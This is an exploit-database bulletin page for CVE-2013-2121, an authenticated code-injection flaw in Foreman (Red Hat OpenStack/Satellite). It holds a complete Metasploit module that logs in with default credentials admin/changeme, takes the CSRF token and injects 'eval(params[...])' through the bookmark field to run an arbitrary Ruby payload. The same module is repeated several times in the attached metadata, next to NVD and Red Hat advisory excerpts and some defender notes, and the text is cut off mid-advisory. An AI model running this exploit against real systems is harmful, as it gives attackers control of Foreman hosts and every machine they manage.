Foreman Red Hat OpenStack/Satellite bookmarks/create Code Injection
2013-07-23T00:00:00
ID EDB-ID:27045 Type exploitdb Reporter metasploit Modified 2013-07-23T00:00:00
Description
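Code injection in the bookmarks/create action of Foreman (Red Hat OpenStack/Satellite), tracked as CVE-2013-2121. Remote exploit for the Linux platform. Per the NVD entry reproduced further down this page, the flaw affects Foreman before 1.2.0-RC2 and is reachable only by an authenticated user who has permission to create bookmarks.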
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
# Metasploit remote exploit module for CVE-2013-2121, an eval injection
# (CWE-95) in the 'create' action of Foreman's 'bookmarks' controller.
#
# What the module does, in order (see #exploit):
#   1. logs in with a supplied account (POST <TARGETURI>/users/login),
#   2. fetches the application root to read the Rails CSRF parameter and token,
#   3. submits a create-bookmark form whose 'bookmark[controller]' field holds
#      Ruby source instead of a controller name.
#
# Reviewer notes for defenders:
# - The bug is authenticated: the NVD entry on this page limits it to users
#   allowed to create bookmarks. The RHSA-2013:0995 text on this page says the
#   injected code runs with the privileges of the user running Foreman, which
#   gives control of the Foreman host and of all systems Foreman manages.
# - Remediation on this page: Foreman 1.2.0-RC2 or later (NVD wording is
#   "before 1.2.0-RC2"); Red Hat shipped the fix as RHSA-2013:0995 and notes
#   that httpd must be restarted for the update to take effect.
# - Log/WAF signal visible in the final request: a POST to <TARGETURI>/bookmarks
#   where 'bookmark[controller]' contains characters such as '(', '[', ':' or
#   '#'. Presumably a legitimate value is a plain controller name, so anything
#   else in that field is worth alerting on (confirm against the bookmark form).
#   The same request carries one extra form parameter with a random lowercase
#   name of 3 to 11 letters that the other fields of the request do not explain.
class Metasploit4 < Msf::Exploit::Remote
# Mixes in the framework's HTTP client, presumably the source of the helpers
# used below (send_request_cgi, normalize_uri, target_uri, ssl, rport, vhost).
include Msf::Exploit::Remote::HttpClient
# Registers the module metadata and the user-settable options.
def initialize
super(
'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',
'Description' => %q{
This module exploits a code injection vulnerability in the 'create'
action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite
(Foreman 1.2.0-RC1 and earlier).
},
'Author' => 'Ramon de C Valle',
'License' => MSF_LICENSE,
# Advisory identifiers and the two upstream trackers (Red Hat Bugzilla and
# the Foreman issue tracker) for this flaw.
'References' =>
[
['CVE', '2013-2121'],
['CWE', '95'],
['OSVDB', '94671'],
['BID', '60833'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],
['URL', 'http://projects.theforeman.org/issues/2631']
],
# The payload is Ruby source: the vulnerable code path evaluates Ruby, so no
# native-code payload is involved.
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
# Declares that the resulting session is not expected to be privileged; the
# effective privilege is whatever account the Foreman application runs as.
'Privileged' => false,
'Targets' =>
[
['Automatic', {}]
],
'DisclosureDate' => 'Jun 6 2013',
# NOTE(review): presumably makes the payload fork so the request-handling
# process is not tied up; confirm against the framework documentation.
'DefaultOptions' => { 'PrependFork' => true },
'DefaultTarget' => 0
)
register_options(
[
# Defaults to HTTPS on 443.
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
# The module ships with admin/changeme as its default credentials.
# NOTE(review): presumably these mirror an installer default; an instance
# that still accepts them exposes this authenticated flaw to anyone who can
# reach the login page, so verify and rotate.
OptString.new('USERNAME', [true, 'Your username', 'admin']),
OptString.new('PASSWORD', [true, 'Your password', 'changeme']),
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
], self.class
)
end
# Runs the three-request sequence described in the class comment. Every
# failure path ends in fail_with; the response to the last request is stored
# in `res` but never inspected, so this method itself does not confirm
# whether the injection succeeded.
def exploit
print_status("Logging into #{target_url}...")
# Request 1: form login with the configured account.
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
'vars_post' => {
'login[login]' => datastore['USERNAME'],
'login[password]' => datastore['PASSWORD']
}
)
fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?
# A redirect back to users/login is treated as a rejected login; any other
# response is expected to set a hexadecimal _session_id cookie.
if res.headers['Location'] =~ /users\/login$/
fail_with(Exploit::Failure::NoAccess, 'Authentication failed')
else
session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/
fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?
end
print_status('Retrieving the CSRF token for this session...')
# Request 2: load a page with the session cookie to obtain the CSRF
# parameter name and token that the bookmark form must echo back.
res = send_request_cgi(
'cookie' => "_session_id=#{session}",
'method' => 'GET',
'uri' => normalize_uri(target_uri)
)
fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?
# Being bounced to the login page here means the session was not accepted.
if res.headers['Location'] =~ /users\/login$/
fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')
else
# The csrf-param / csrf-token <meta> tags are matched with content= first,
# then (if either is missing) with name= first, to cover both attribute
# orders.
csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]*\/?>/i
csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]*\/?>/i
if csrf_param.nil? || csrf_token.nil?
csrf_param = $1 if res.body =~ /<meta[ ]+name="csrf-param"[ ]+content="(.*)"[ ]*\/?>/i
csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(.*)"[ ]*\/?>/i
end
fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?
end
# Random lowercase name, 3 to 11 letters (rand(9) is 0..8), for the form
# parameter that carries the payload.
payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)
print_status("Sending create-bookmark request to #{target_url('bookmarks')}...")
# Request 3: the create-bookmark POST. 'bookmark[controller]' is the field the
# advisories identify as reaching eval on the server; here it holds an
# expression that reads the randomly named parameter. Name and query are
# random filler. The CSRF token is valid, so CSRF protection does not stop
# this request; the server-side remedy is the upgrade named in the class
# comment, not request filtering alone.
res = send_request_cgi(
'cookie' => "_session_id=#{session}",
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'bookmarks'),
'vars_post' => {
csrf_param => csrf_token,
payload_param => payload.encoded,
'bookmark[controller]' => "eval(params[:#{payload_param}])#",
'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3),
'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3)
}
)
end
# Builds a printable URL (scheme, vhost, optional port, normalised path) for
# the status messages in #exploit; it is not used to send any request.
# The port is omitted whenever it is 80 or 443, regardless of the scheme
# chosen by `ssl`, so e.g. HTTPS on port 80 prints without a port.
def target_url(*args)
(ssl ? 'https' : 'http') +
if rport.to_i == 80 || rport.to_i == 443
"://#{vhost}"
else
"://#{vhost}:#{rport}"
end + normalize_uri(target_uri.path, *args)
end
end
{"id": "EDB-ID:27045", "hash": "f0ddba49362313bbc4f88c086facef4b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Foreman Red Hat OpenStack/Satellite bookmarks/create Code Injection", "description": "Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection. CVE-2013-2121. Remote exploit for linux platform", "published": "2013-07-23T00:00:00", "modified": "2013-07-23T00:00:00", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/27045/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2013-2121"], "lastseen": "2016-02-03T04:59:40", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2016-02-03T04:59:40"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-2121"]}, {"type": "zdt", "idList": ["1337DAY-ID-21021"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122510"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/FOREMAN_OPENSTACK_SATELLITE_CODE_EXEC"]}, {"type": "redhat", "idList": ["RHSA-2013:0995"]}], "modified": "2016-02-03T04:59:40"}, "vulnersScore": 5.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/27045/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize\r\n super(\r\n 'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',\r\n 'Description' => %q{\r\n This module exploits a code injection vulnerability in the 'create'\r\n action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite\r\n (Foreman 1.2.0-RC1 and earlier).\r\n },\r\n 'Author' => 'Ramon de C Valle',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-2121'],\r\n ['CWE', '95'],\r\n ['OSVDB', '94671'],\r\n ['BID', '60833'],\r\n ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],\r\n ['URL', 'http://projects.theforeman.org/issues/2631']\r\n ],\r\n 'Platform' => 'ruby',\r\n 'Arch' => ARCH_RUBY,\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}]\r\n ],\r\n 'DisclosureDate' => 'Jun 6 2013',\r\n 'DefaultOptions' => { 'PrependFork' => true },\r\n 'DefaultTarget' => 0\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptBool.new('SSL', [true, 'Use SSL', true]),\r\n OptString.new('USERNAME', [true, 'Your username', 'admin']),\r\n OptString.new('PASSWORD', [true, 'Your password', 'changeme']),\r\n OptString.new('TARGETURI', [ true, 'The path to the application', '/']),\r\n ], self.class\r\n )\r\n end\r\n\r\n def exploit\r\n print_status(\"Logging into #{target_url}...\")\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'users', 'login'),\r\n 'vars_post' => {\r\n 'login[login]' => datastore['USERNAME'],\r\n 'login[password]' => datastore['PASSWORD']\r\n }\r\n )\r\n\r\n fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?\r\n\r\n if res.headers['Location'] =~ /users\\/login$/\r\n fail_with(Exploit::Failure::NoAccess, 
'Authentication failed')\r\n else\r\n session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/\r\n fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?\r\n end\r\n\r\n print_status('Retrieving the CSRF token for this session...')\r\n res = send_request_cgi(\r\n 'cookie' => \"_session_id=#{session}\",\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri)\r\n )\r\n\r\n fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?\r\n\r\n if res.headers['Location'] =~ /users\\/login$/\r\n fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')\r\n else\r\n csrf_param = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-param\"[ ]*\\/?>/i\r\n csrf_token = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-token\"[ ]*\\/?>/i\r\n\r\n if csrf_param.nil? || csrf_token.nil?\r\n csrf_param = $1 if res.body =~ /<meta[ ]+name=\"csrf-param\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\r\n csrf_token = $1 if res.body =~ /<meta[ ]+name=\"csrf-token\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\r\n end\r\n\r\n fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?\r\n end\r\n\r\n payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)\r\n\r\n print_status(\"Sending create-bookmark request to #{target_url('bookmarks')}...\")\r\n res = send_request_cgi(\r\n 'cookie' => \"_session_id=#{session}\",\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'bookmarks'),\r\n 'vars_post' => {\r\n csrf_param => csrf_token,\r\n payload_param => payload.encoded,\r\n 'bookmark[controller]' => \"eval(params[:#{payload_param}])#\",\r\n 'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3),\r\n 'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3)\r\n }\r\n )\r\n end\r\n\r\n def target_url(*args)\r\n (ssl ? 
'https' : 'http') +\r\n if rport.to_i == 80 || rport.to_i == 443\r\n \"://#{vhost}\"\r\n else\r\n \"://#{vhost}:#{rport}\"\r\n end + normalize_uri(target_uri.path, *args)\r\n end\r\nend", "osvdbidlist": ["94671"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:13:02", "bulletinFamily": "NVD", "description": "Eval injection vulnerability in the create method in the Bookmarks controller in Foreman before 1.2.0-RC2 allows remote authenticated users with permissions to create bookmarks to execute arbitrary code via a controller name attribute.", "modified": "2018-08-13T21:47:00", "id": "CVE-2013-2121", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2121", "published": "2013-07-31T13:20:00", "title": "CVE-2013-2121", "type": "cve", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-20T00:11:05", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a code injection vulnerability in the 'create' action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite (Foreman 1.2.0-RC1 and earlier).", "modified": "2013-07-23T00:00:00", "published": "2013-07-23T00:00:00", "id": "1337DAY-ID-21021", "href": "https://0day.today/exploit/description/21021", "type": "zdt", "title": "Foreman (Red Hat OpenStack/Satellite) Code Injection Vulnerability", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize\r\n super(\r\n 'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',\r\n 'Description' => %q{\r\n This module exploits a code injection vulnerability in the 'create'\r\n action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite\r\n (Foreman 1.2.0-RC1 and earlier).\r\n },\r\n 'Author' => 'Ramon de C Valle',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-2121'],\r\n ['CWE', '95'],\r\n ['OSVDB', '94671'],\r\n ['BID', '60833'],\r\n ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],\r\n ['URL', 'http://projects.theforeman.org/issues/2631']\r\n ],\r\n 'Platform' => 'ruby',\r\n 'Arch' => ARCH_RUBY,\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}]\r\n ],\r\n 'DisclosureDate' => 'Jun 6 2013',\r\n 'DefaultOptions' => { 'PrependFork' => true },\r\n 'DefaultTarget' => 0\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptBool.new('SSL', [true, 'Use SSL', true]),\r\n OptString.new('USERNAME', [true, 'Your username', 'admin']),\r\n OptString.new('PASSWORD', [true, 'Your password', 'changeme']),\r\n OptString.new('TARGETURI', [ true, 'The path to the application', '/']),\r\n ], self.class\r\n )\r\n end\r\n\r\n def exploit\r\n print_status(\"Logging into #{target_url}...\")\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'users', 'login'),\r\n 'vars_post' => {\r\n 'login[login]' => datastore['USERNAME'],\r\n 'login[password]' => datastore['PASSWORD']\r\n }\r\n )\r\n\r\n fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?\r\n\r\n if res.headers['Location'] =~ /users\\/login$/\r\n fail_with(Exploit::Failure::NoAccess, 
'Authentication failed')\r\n else\r\n session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/\r\n fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?\r\n end\r\n\r\n print_status('Retrieving the CSRF token for this session...')\r\n res = send_request_cgi(\r\n 'cookie' => \"_session_id=#{session}\",\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri)\r\n )\r\n\r\n fail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil?\r\n\r\n if res.headers['Location'] =~ /users\\/login$/\r\n fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')\r\n else\r\n csrf_param = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-param\"[ ]*\\/?>/i\r\n csrf_token = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-token\"[ ]*\\/?>/i\r\n\r\n if csrf_param.nil? || csrf_token.nil?\r\n csrf_param = $1 if res.body =~ /<meta[ ]+name=\"csrf-param\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\r\n csrf_token = $1 if res.body =~ /<meta[ ]+name=\"csrf-token\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\r\n end\r\n\r\n fail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?\r\n end\r\n\r\n payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)\r\n\r\n print_status(\"Sending create-bookmark request to #{target_url('bookmarks')}...\")\r\n res = send_request_cgi(\r\n 'cookie' => \"_session_id=#{session}\",\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'bookmarks'),\r\n 'vars_post' => {\r\n csrf_param => csrf_token,\r\n payload_param => payload.encoded,\r\n 'bookmark[controller]' => \"eval(params[:#{payload_param}])#\",\r\n 'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3),\r\n 'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3)\r\n }\r\n )\r\n end\r\n\r\n def target_url(*args)\r\n (ssl ? 
'https' : 'http') +\r\n if rport.to_i == 80 || rport.to_i == 443\r\n \"://#{vhost}\"\r\n else\r\n \"://#{vhost}:#{rport}\"\r\n end + normalize_uri(target_uri.path, *args)\r\n end\r\nend\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21021"}], "packetstorm": [{"lastseen": "2016-12-05T22:18:12", "bulletinFamily": "exploit", "description": "", "modified": "2013-07-23T00:00:00", "published": "2013-07-23T00:00:00", "href": "https://packetstormsecurity.com/files/122510/Foreman-Red-Hat-OpenStack-Satellite-Code-Injection.html", "id": "PACKETSTORM:122510", "title": "Foreman (Red Hat OpenStack/Satellite) Code Injection", "type": "packetstorm", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit4 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize \nsuper( \n'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection', \n'Description' => %q{ \nThis module exploits a code injection vulnerability in the 'create' \naction of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite \n(Foreman 1.2.0-RC1 and earlier). 
\n}, \n'Author' => 'Ramon de C Valle', \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2013-2121'], \n['CWE', '95'], \n['OSVDB', '94671'], \n['BID', '60833'], \n['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'], \n['URL', 'http://projects.theforeman.org/issues/2631'] \n], \n'Platform' => 'ruby', \n'Arch' => ARCH_RUBY, \n'Privileged' => false, \n'Targets' => \n[ \n['Automatic', {}] \n], \n'DisclosureDate' => 'Jun 6 2013', \n'DefaultOptions' => { 'PrependFork' => true }, \n'DefaultTarget' => 0 \n) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptBool.new('SSL', [true, 'Use SSL', true]), \nOptString.new('USERNAME', [true, 'Your username', 'admin']), \nOptString.new('PASSWORD', [true, 'Your password', 'changeme']), \nOptString.new('TARGETURI', [ true, 'The path to the application', '/']), \n], self.class \n) \nend \n \ndef exploit \nprint_status(\"Logging into #{target_url}...\") \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'users', 'login'), \n'vars_post' => { \n'login[login]' => datastore['USERNAME'], \n'login[password]' => datastore['PASSWORD'] \n} \n) \n \nfail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil? \n \nif res.headers['Location'] =~ /users\\/login$/ \nfail_with(Exploit::Failure::NoAccess, 'Authentication failed') \nelse \nsession = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/ \nfail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil? \nend \n \nprint_status('Retrieving the CSRF token for this session...') \nres = send_request_cgi( \n'cookie' => \"_session_id=#{session}\", \n'method' => 'GET', \n'uri' => normalize_uri(target_uri) \n) \n \nfail_with(Exploit::Failure::Unknown, 'No response from remote host') if res.nil? 
\n \nif res.headers['Location'] =~ /users\\/login$/ \nfail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') \nelse \ncsrf_param = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-param\"[ ]*\\/?>/i \ncsrf_token = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-token\"[ ]*\\/?>/i \n \nif csrf_param.nil? || csrf_token.nil? \ncsrf_param = $1 if res.body =~ /<meta[ ]+name=\"csrf-param\"[ ]+content=\"(.*)\"[ ]*\\/?>/i \ncsrf_token = $1 if res.body =~ /<meta[ ]+name=\"csrf-token\"[ ]+content=\"(.*)\"[ ]*\\/?>/i \nend \n \nfail_with(Exploit::Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil? \nend \n \npayload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3) \n \nprint_status(\"Sending create-bookmark request to #{target_url('bookmarks')}...\") \nres = send_request_cgi( \n'cookie' => \"_session_id=#{session}\", \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'bookmarks'), \n'vars_post' => { \ncsrf_param => csrf_token, \npayload_param => payload.encoded, \n'bookmark[controller]' => \"eval(params[:#{payload_param}])#\", \n'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3), \n'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3) \n} \n) \nend \n \ndef target_url(*args) \n(ssl ? 
'https' : 'http') + \nif rport.to_i == 80 || rport.to_i == 443 \n\"://#{vhost}\" \nelse \n\"://#{vhost}:#{rport}\" \nend + normalize_uri(target_uri.path, *args) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122510/foreman_openstack_satellite_code_exec.rb.txt", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2019-12-07T15:26:35", "bulletinFamily": "exploit", "description": "This module exploits a code injection vulnerability in the 'create' action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite (Foreman 1.2.0-RC1 and earlier).\n", "modified": "2017-07-24T13:26:21", "published": "2013-07-16T15:07:31", "id": "MSF:EXPLOIT/LINUX/HTTP/FOREMAN_OPENSTACK_SATELLITE_CODE_EXEC", "href": "", "type": "metasploit", "title": "Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize\n super(\n 'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',\n 'Description' => %q{\n This module exploits a code injection vulnerability in the 'create'\n action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite\n (Foreman 1.2.0-RC1 and earlier).\n },\n 'Author' => 'Ramon de C Valle',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2013-2121'],\n ['CWE', '95'],\n ['OSVDB', '94671'],\n ['BID', '60833'],\n ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],\n ['URL', 'http://projects.theforeman.org/issues/2631']\n ],\n 'Platform' => 'ruby',\n 'Arch' => ARCH_RUBY,\n 'Privileged' => false,\n 'Targets' =>\n [\n ['Automatic', {}]\n ],\n 'DisclosureDate' => 'Jun 6 2013',\n 
'DefaultOptions' => { 'PrependFork' => true },\n 'DefaultTarget' => 0\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptString.new('USERNAME', [true, 'Your username', 'admin']),\n OptString.new('PASSWORD', [true, 'Your password', 'changeme']),\n OptString.new('TARGETURI', [ true, 'The path to the application', '/']),\n ], self.class\n )\n end\n\n def exploit\n print_status(\"Logging into #{target_url}...\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'users', 'login'),\n 'vars_post' => {\n 'login[login]' => datastore['USERNAME'],\n 'login[password]' => datastore['PASSWORD']\n }\n )\n\n fail_with(Failure::Unknown, 'No response from remote host') if res.nil?\n\n if res.headers['Location'] =~ /users\\/login$/\n fail_with(Failure::NoAccess, 'Authentication failed')\n else\n session = $1 if res.get_cookies =~ /_session_id=([0-9a-f]*)/\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?\n end\n\n print_status('Retrieving the CSRF token for this session...')\n res = send_request_cgi(\n 'cookie' => \"_session_id=#{session}\",\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri)\n )\n\n fail_with(Failure::Unknown, 'No response from remote host') if res.nil?\n\n if res.headers['Location'] =~ /users\\/login$/\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')\n else\n csrf_param = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-param\"[ ]*\\/?>/i\n csrf_token = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-token\"[ ]*\\/?>/i\n\n if csrf_param.nil? || csrf_token.nil?\n csrf_param = $1 if res.body =~ /<meta[ ]+name=\"csrf-param\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\n csrf_token = $1 if res.body =~ /<meta[ ]+name=\"csrf-token\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\n end\n\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? 
|| csrf_token.nil?\n end\n\n payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)\n\n print_status(\"Sending create-bookmark request to #{target_url('bookmarks')}...\")\n res = send_request_cgi(\n 'cookie' => \"_session_id=#{session}\",\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'bookmarks'),\n 'vars_post' => {\n csrf_param => csrf_token,\n payload_param => payload.encoded,\n 'bookmark[controller]' => \"eval(params[:#{payload_param}])#\",\n 'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3),\n 'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3)\n }\n )\n end\n\n def target_url(*args)\n (ssl ? 'https' : 'http') +\n if rport.to_i == 80 || rport.to_i == 443\n \"://#{vhost}\"\n else\n \"://#{vhost}:#{rport}\"\n end + normalize_uri(target_uri.path, *args)\n end\nend\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb"}], "redhat": [{"lastseen": "2019-08-13T18:45:59", "bulletinFamily": "unix", "description": "The Foreman packages provide facilities for rapidly deploying Red Hat\nOpenStack 3.0 (\"Grizzly\") Preview. These packages are provided as a\nTechnology Preview. For more information on the scope and nature of support\nfor items marked as Technology Preview, refer to\nhttps://access.redhat.com/support/offerings/techpreview/\n\nA flaw was found in the create method of the Foreman Bookmarks controller.\nA user with privileges to create a bookmark could use this flaw to execute\narbitrary code with the privileges of the user running Foreman, giving them\ncontrol of the system running Foreman (such as installing new packages) and\nall systems managed by Foreman. (CVE-2013-2121)\n\nA flaw was found in the way the Foreman UsersController controller handled\nuser creation. 
